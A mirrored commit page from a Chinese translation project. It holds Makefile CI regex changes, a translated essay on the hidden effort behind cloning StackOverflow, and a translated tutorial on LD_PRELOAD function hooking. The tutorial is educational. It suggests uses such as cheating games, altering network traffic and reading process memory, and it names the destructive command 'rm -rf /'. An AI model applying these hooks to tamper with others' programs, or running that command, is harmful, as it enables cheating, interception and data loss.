mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-01-25 23:11:02 +08:00
完成翻译
This commit is contained in:
commit
13cd5752f6
16
Makefile
16
Makefile
@ -18,28 +18,28 @@ $(CHANGE_FILE):
|
||||
git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@
|
||||
|
||||
rule-source-added:
|
||||
[ $(shell grep '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ]
|
||||
[ $(shell grep -v '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ]
|
||||
[ $(shell grep '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ]
|
||||
[ $(shell grep -v '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 0 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-requested:
|
||||
[ $(shell grep '^M\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^M\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-completed:
|
||||
[ $(shell grep '^D\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^D\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-revised:
|
||||
[ $(shell grep '^M\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^M\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-published:
|
||||
[ $(shell grep '^D\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s\+published/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^D\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s*published/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
@ -0,0 +1,87 @@
|
||||
# [因为这个我要点名批评 Hacker News ][14]
|
||||
|
||||
|
||||
> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗?
|
||||
不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。”
|
||||
>
|
||||
> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座
|
||||
|
||||
[指责开源软件总是离奇难用已经不是一个新论点了][5];这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢?
|
||||
|
||||
在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在 7 月 4 号的周末就写出一版和 StackOverflow 原版一模一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。
|
||||
|
||||
秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以像我一样打字飞快,一分钟能敲 100 个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计 2.3MB 的源码来估计(包括 .CS、 .SQL、 .CSS、 .JS 和 .aspx 文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。
|
||||
|
||||
或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄 StackOverflow 源代码用时的十倍时间来让我自己写 StackOverflow,我可是打死也做不到。
|
||||
|
||||
_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow __大部分__ 的功能呢?这总归会容易很多了吧。*
|
||||
|
||||
好的,问题是什么是 “大部分” 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题及其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且与 Markdown 结合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标、小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。
|
||||
|
||||
但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。
|
||||
|
||||
除非……除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登录事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和<ruby>徽章<rt>Badge</rt></ruby>。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot、Reddit 或是 StackOverflow 这些动作影响到。
|
||||
|
||||
在这之后!你会以为你基本已经大功告成了!
|
||||
|
||||
……为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计、AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一模一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。
|
||||
|
||||
那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢?
|
||||
|
||||
正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码:
|
||||
|
||||
```
|
||||
create table QUESTION (ID identity primary key,
|
||||
TITLE varchar(255), --- 为什么我知道你认为是 255
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
USER integer references USER(ID));
|
||||
create table RESPONSE (ID identity primary key,
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
QUESTION integer references QUESTION(ID))
|
||||
```
|
||||
|
||||
如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登录和注销功能、评论功能、投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登录和评论的功能。
|
||||
|
||||
但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它的数据库的 Schema 没有多大关系 —— 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_
|
||||
|
||||
这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿徽章功能来说,如果你要针对普通终端用户来设计徽章, 则要么需要实现一个用户可用来个性化设置徽章的 GUI,要么则取巧的设计出一个比较通用的徽章,供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给徽章这种东西设计一个功能全面的 GUI 是根本不可能的。而且他们会固执地把任何标准徽章的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制,提供以 Python 或 PHP 为基础的一些系统 API, 以便那些可以自如使用 Python 或 PHP 的人可以轻松的通过这些编程接口来定制化他们自己的徽章。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法)
|
||||
|
||||
同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何 mod 的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的却是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。
|
||||
|
||||
开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。
|
||||
|
||||
这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache、[Django][12]、[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 Ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。
|
||||
|
||||
相比之下,MS SQL (微软的 SQL 数据库) 则不需要你手工配置以上的任何一样东西。至于 Apache …… 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机、MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。
|
||||
|
||||
所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的在一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
||||
|
||||
作者:[Benjamin Pollack][a]
|
||||
译者:[hopefully2333](https://github.com/hopefully2333),[yunfengHe](https://github.com/yunfengHe)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bitquabit.com/meta/about/
|
||||
[1]:http://www.cs.duke.edu/~ola/
|
||||
[2]:http://www.cs.duke.edu/courses/cps108/spring04/
|
||||
[3]:https://bitquabit.com/categories/programming
|
||||
[4]:https://bitquabit.com/categories/technology
|
||||
[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/
|
||||
[6]:http://news.ycombinator.com/item?id=678501
|
||||
[7]:http://news.ycombinator.com/item?id=678704
|
||||
[8]:http://code.google.com/p/cnprog/
|
||||
[9]:http://code.google.com/p/soclone/
|
||||
[10]:http://en.wikipedia.org/wiki/Words_per_minute
|
||||
[11]:http://github.com/derobins/wmd/tree/master
|
||||
[12]:http://www.djangoproject.com/
|
||||
[13]:http://www.postgresql.org/
|
||||
[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
@ -0,0 +1,206 @@
|
||||
动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序
|
||||
=============
|
||||
|
||||
**本文假设你具备基本的 C 技能**
|
||||
|
||||
Linux 完全在你的控制之中。虽然从每个人的角度来看似乎并不总是这样,但是高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。
|
||||
|
||||
### 一个让我们产生兴趣的示例
|
||||
|
||||
让我们以一个简单的示例开始。先乐趣,后科学。
|
||||
|
||||
|
||||
*random_num.c:*
|
||||
|
||||
```
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
|
||||
int main(){
|
||||
srand(time(NULL));
|
||||
int i = 10;
|
||||
while(i--) printf("%d\n",rand()%100);
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
我相信,它足够简单吧。我不使用任何参数来编译它,如下所示:
|
||||
|
||||
```
|
||||
gcc random_num.c -o random_num
|
||||
```
|
||||
|
||||
我希望它输出的结果是明确的:从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。
|
||||
|
||||
现在,让我们假装真的不知道这个可执行程序的出处。甚至将它的源文件删除,或者把它移动到别的地方 —— 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你并不需要接触到它的源代码,也不需要重新编译它。
|
||||
|
||||
因此,让我们来创建另外一个简单的 C 文件:
|
||||
|
||||
*unrandom.c:*
|
||||
|
||||
```
|
||||
int rand(){
|
||||
return 42; //the most random number in the universe
|
||||
}
|
||||
```
|
||||
|
||||
我们将编译它进入一个共享库中。
|
||||
|
||||
```
|
||||
gcc -shared -fPIC unrandom.c -o unrandom.so
|
||||
```
|
||||
|
||||
因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 `42` 实现了一个 `rand()` 函数。现在 …… 就像运行 `random_num` 一样,然后再观察结果:
|
||||
|
||||
```
|
||||
LD_PRELOAD=$PWD/unrandom.so ./random_nums
|
||||
```
|
||||
|
||||
如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 —— 它输出了十次常数 42。
|
||||
|
||||
如果先这样执行
|
||||
|
||||
```
|
||||
export LD_PRELOAD=$PWD/unrandom.so
|
||||
```
|
||||
|
||||
然后再以正常方式运行这个程序,这个结果也许会更让你吃惊:一个未被改变过的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 ……
|
||||
|
||||
**等等,什么?刚刚发生了什么?**
|
||||
|
||||
是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” `rand()`,而是使用了我们提供的的那个 —— 它每次都返回 `42`。
|
||||
|
||||
**但是,我们*告诉过*它去使用真实的那个。我们编程让它去使用真实的那个。另外,在创建那个程序的时候,假冒的 `rand()` 甚至并不存在!**
|
||||
|
||||
这句话并不完全正确。我们只能告诉它去使用 `rand()`,但是我们不能去选择哪个 `rand()` 是我们希望我们的程序去使用的。
|
||||
|
||||
当我们的程序启动后,(为程序提供所需要的函数的)某些库被加载。我们可以使用 `ldd` 去学习它是怎么工作的:
|
||||
|
||||
```
|
||||
$ ldd random_nums
|
||||
linux-vdso.so.1 => (0x00007fff4bdfe000)
|
||||
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000)
|
||||
/lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000)
|
||||
```
|
||||
|
||||
正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的具体的输出可能与示例有所不同,但是,一个 `libc.so` 肯定是有的 —— 这个文件提供了核心的 C 函数。它包含了 “真正的” `rand()`。
|
||||
|
||||
我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数:
|
||||
|
||||
```
|
||||
nm -D /lib/libc.so.6
|
||||
```
|
||||
|
||||
这个 `nm` 命令列出了在一个二进制文件中找到的符号。`-D` 标志告诉它去查找动态符号,因为 `libc.so.6` 是一个动态库。这个输出是很长的,但它确实在列出的很多标准函数中包括了 `rand()`。
|
||||
|
||||
现在,在我们设置了环境变量 `LD_PRELOAD` 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 `unrandom.so`,尽管程序本身并没有这样去要求它。下列的命令可以看得出来:
|
||||
|
||||
```
|
||||
$ LD_PRELOAD=$PWD/unrandom.so ldd random_nums
|
||||
linux-vdso.so.1 => (0x00007fff369dc000)
|
||||
/some/path/to/unrandom.so (0x00007f262b439000)
|
||||
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000)
|
||||
/lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000)
|
||||
```
|
||||
|
||||
注意,它列出了我们当前的库。实际上这就是代码为什么得以运行的原因:`random_num` 调用了 `rand()`,但是,如果 `unrandom.so` 被加载,它调用的是我们所提供的实现了 `rand()` 的库。很清楚吧,不是吗?
|
||||
|
||||
### 更清楚地了解
|
||||
|
||||
这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够像个正常的函数一样工作。如果我们使用一个简单的 `return 0` 去实现 `open()` 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 `open()`:
|
||||
|
||||
*inspect_open.c:*
|
||||
|
||||
```
|
||||
int open(const char *pathname, int flags){
|
||||
/* Some evil injected code goes here. */
|
||||
return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so
|
||||
}
|
||||
```
|
||||
|
||||
嗯,不对。这将不会去调用 “原始的” `open(...)`。显然,这是一个无休止的递归调用。
|
||||
|
||||
怎么去访问这个 “真正的” `open()` 函数呢?它需要去使用程序接口进行动态链接。它比听起来更简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么:
|
||||
|
||||
*inspect_open.c:*
|
||||
|
||||
```
|
||||
#define _GNU_SOURCE
|
||||
#include <dlfcn.h>
|
||||
|
||||
typedef int (*orig_open_f_type)(const char *pathname, int flags);
|
||||
|
||||
int open(const char *pathname, int flags, ...)
|
||||
{
|
||||
/* Some evil injected code goes here. */
|
||||
|
||||
orig_open_f_type orig_open;
|
||||
orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open");
|
||||
return orig_open(pathname,flags);
|
||||
}
|
||||
```
|
||||
|
||||
`dlfcn.h` 是我们后面用到的 `dlsym` 函数所需要的。那个奇怪的 `#define` 是命令编译器去允许一些非标准的东西,我们需要它来启用 `dlfcn.h` 中的 `RTLD_NEXT`。那个 `typedef` 只是创建了一个函数指针类型的别名,它的参数等同于原始的 `open` —— 它现在的别名是 `orig_open_f_type`,我们将在后面用到它。
|
||||
|
||||
我们定制的 `open(...)` 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 `open(...)` 函数。为了得到那个函数的地址,我们请求 `dlsym` 在动态库堆栈上为我们查找下一个 `open()` 函数。最后,我们调用了那个函数(传递了与我们的假冒 `open()` 一样的参数),并且返回它的返回值。
|
||||
|
||||
我使用下面的内容作为我的 “邪恶的注入代码”:
|
||||
|
||||
*inspect_open.c (片段):*
|
||||
|
||||
```
|
||||
printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h!
|
||||
```
|
||||
|
||||
要编译它,我需要稍微调整一下编译参数:
|
||||
|
||||
```
|
||||
gcc -shared -fPIC inspect_open.c -o inspect_open.so -ldl
|
||||
```
|
||||
|
||||
我增加了 `-ldl`,因此,它将这个共享库链接到 `libdl` —— 它提供了 `dlsym` 函数。(不,我还没有创建一个假冒版的 `dlsym` ,虽然这样更有趣)
|
||||
|
||||
因此,结果是什么呢?一个实现了 `open(...)` 函数的共享库,除了它有 _输出_ 文件路径的意外作用以外,其它的表现和真正的 `open(...)` 函数 **一模一样**。:-)
|
||||
|
||||
如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了:
|
||||
|
||||
```
|
||||
LD_PRELOAD=$PWD/inspect_open.so gnome-calculator
|
||||
```
|
||||
|
||||
我鼓励你去看看自己实验的结果,但是简单来说,它实时列出了这个应用程序可以访问到的每个文件。
|
||||
|
||||
我相信它并不难想像为什么这可以用于去调试或者研究未知的应用程序。请注意,这个特定诀窍并不完整,因为 `open()` 并不是唯一一个打开文件的函数 …… 例如,在标准库中也有一个 `open64()`,并且为了完整地研究,你也需要为它去创建一个假冒的。
|
||||
|
||||
### 可能的用法
|
||||
|
||||
如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情!
|
||||
|
||||
1. ~~获得 root 权限~~。你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。)
|
||||
2. 欺骗游戏:**取消随机化**。这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从 `/dev/urandom` 之类的读取,你可以通过使用一个修改过的文件路径来运行原始的 `open()` 来把它们重定向到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来很容易上手。
|
||||
3. 欺骗游戏:**让子弹飞一会** 。实现所有的与时间有关的标准函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量和与时间相关的 `sleep` 或其它函数正确地计算了新的值,那么受影响的应用程序将认为时间变慢了(你想的话,也可以变快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用和禁用慢进或快进任何时间。
|
||||
4. 研究应用程序:**列出访问的文件**。它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。
|
||||
5. 研究应用程序:**监视因特网访问**。你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地控制基于 web 的应用程序发送了什么,不仅是看看,而是也能影响到交换的数据。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析和逆向工程使用闭源协议的应用程序。
|
||||
6. 研究应用程序:**检查 GTK 结构** 。为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们就可以知道一个应用程序使用了哪些组件,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习一些应用程序是怎么管理其界面的,这个方法超级有用!
|
||||
7. **在沙盒中运行不安全的应用程序**。如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /` 或者一些其它不希望的文件活动,你可以通过修改传递到文件相关的函数(不仅是 `open` ,也包括删除目录等)的参数,来重定向所有的文件 I/O 操作到诸如 `/tmp` 这样地方。还有更难的诀窍,如 chroot,但是它也给你提供更多的控制。它可以更安全地完全 “封装”,但除非你真的知道你在做什么,不要以这种方式真的运行任何恶意软件。
|
||||
8. **实现特性** 。[zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问文件时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。
|
||||
9. **修复 bug**。另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype(它是闭源的软件)从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,这就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。
|
||||
10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作,而 `LD_PRELOAD` 则不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问所有的应用程序内存,从本质上看,是因为它是通过应用程序自身得以运行的。你可以修改这个应用程序能修改的任何东西。你可以想像一下,它允许你做许多的底层的侵入…… ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。
|
||||
|
||||
这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 —— 通过下面的评论区共享出来吧!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
|
||||
|
||||
作者:[Rafał Cieślak][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://rafalcieslak.wordpress.com/
|
||||
[1]:http://www.zlibc.linux.lu/index.html
|
||||
|
||||
|
@ -1,86 +1,80 @@
|
||||
Linux 用户的逻辑卷管理指南
|
||||
逻辑卷管理(LVM) Linux 用户指南
|
||||
============================================================
|
||||
|
||||
![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)")
|
||||
|
||||
Image by : opensource.com
|
||||
|
||||
